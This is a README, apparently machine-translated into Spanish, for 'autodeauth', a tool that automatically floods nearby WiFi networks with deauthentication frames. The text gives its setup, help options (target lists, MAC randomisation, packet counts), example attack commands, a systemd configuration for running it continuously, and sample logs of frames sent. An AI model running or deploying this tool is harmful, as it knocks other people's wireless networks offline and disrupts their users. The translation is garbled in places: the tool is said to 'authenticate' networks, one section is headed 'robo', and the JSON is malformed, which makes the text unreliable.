
muerte automática es una herramienta creada para autenticar automáticamente las redes locales
- Probado en sistema operativo Raspberry Pi y Kali Linux
configurar
$ chmod +x configuración.sh
$ sudo ./setup.sh
[] Esto se puede cambiar editando /etc/systemd/system/autodeauth.service [?] Ingrese la interfaz WiFi para usar con el servicio de autodeauth: wlan0 [] ¡Instalado! , puede usar sudo autodeauth -h para ver las opciones disponibles.
[] Inicie el servicio con sudo systemctl start autodeauth [] Consulte el LÉAME para obtener más información sobre la configuración del servicio.
Opciones
$ sudo autodeauth -h _ _ _ _ _ /\ || | \ _ _ ||| |_
/_\ || | / \ |) / –) ` | || | | ‘\//__,|____//__,|_,|__||||
Uso: descifrado automático [-h] –interfaz interfaz [–blacklist BLACKLIST] [–whitelist WHITELIST] [–led LED] [–time TIME] [–random] [–ignore] [–count COUNT] [–verbose VERBOSE]
Herramienta de eliminación automática
Opciones:
-h, –help muestra este mensaje de ayuda y sale
–interfaz interfaz, -i interfaz
Interfaz para obtener red WiFi y enviar paquetes de deauth (debe ser compatible con la inyección de paquetes)
–lista negra lista negra, -b lista negra
Lista de direcciones de red ssid/mac para evitar (separadas por comas)
–lista blanca LISTA BLANCA, -w LISTA BLANCA
Lista de direcciones ssid/mac de la red de destino (separadas por comas)
–led LED, -l LED Número de pin LED para pantalla LED
–time TIME, -t TIME tiempo (en s) entre dos paquetes de deauth (predeterminado 0)
–random, -r aleatoriza tu dirección MAC antes de cancelar cada red
–ignorar ignorar errores encontrados al aleatorizar direcciones MAC
–cuenta cuenta, -c cuenta
Número de paquetes a enviar (predeterminado 5000)
–detallado detallado, -v detallado
Configuración detallada de Scapy (predeterminado: 0)
Después de ejecutar la configuración, puede ejecutar el script con autodeauth desde cualquier directorio
Línea de comando
Las redes con espacios se pueden representar por sus direcciones MAC
$ sudo autodeauth -i wlan0 –blacklist FreeWiFi,E1:DB:12:2F:C1:57 -c 10000
Atender
$ sudo systemctl iniciar autodeauth
robo
Cuando se detecta una red y cumple con los criterios de la lista blanca/lista negra, su información de red se guardará como un archivo json en /var/log/autodeauth/
{
«ssid»: «Mi red WiFi»,
«dirección_mac»: «10:0B:21:2E:C1:11»,
«canal 1,
«red.frecuencia»: «2.412 GHz»,
«modo»: «Maestro»,
«tasa de bits»: [
“6 Mb/s”,
“9 Mb/s”,
“12 Mb/s”,
“18 Mb/s”,
“24 Mb/s”,
“36 Mb/s”,
“48 Mb/s”,
“54 Mb/s”
],
«tipo de cifrado»: «wpa2»,
«cifrado»: cierto,
«calidad»: «70/70»,
«Señal»: -35
}
archivo de registro
$ cat /var/log/autodeauth/log
2022-08-20 21:01:31 – Escanear red local
2022-08-20 21:20:29 – Envío de 5000 tramas de deauth a la red: A0:63:91:D5:B8:76 — MyWiFiNetwork
2022-08-20 21:21:00 – salida/limpieza
Para cambiar la configuración del servicio de autodeauth, edite el archivo /etc/systemd/system/autodeauth.service
Supongamos que desea establecer la siguiente configuración como un servicio
ps sudo autodeauth -i wlan0 –blacklist FreeWiFi, myWifi -c 10000
$ vim /etc/systemd/system/autodeauth.servicio
Luego cambia la línea ExecStart a
ExecStart=/usr/bin/python3 /usr/local/bin/autodeauth -i wlan0 –blacklist FreeWiFi,myWifi -c 10000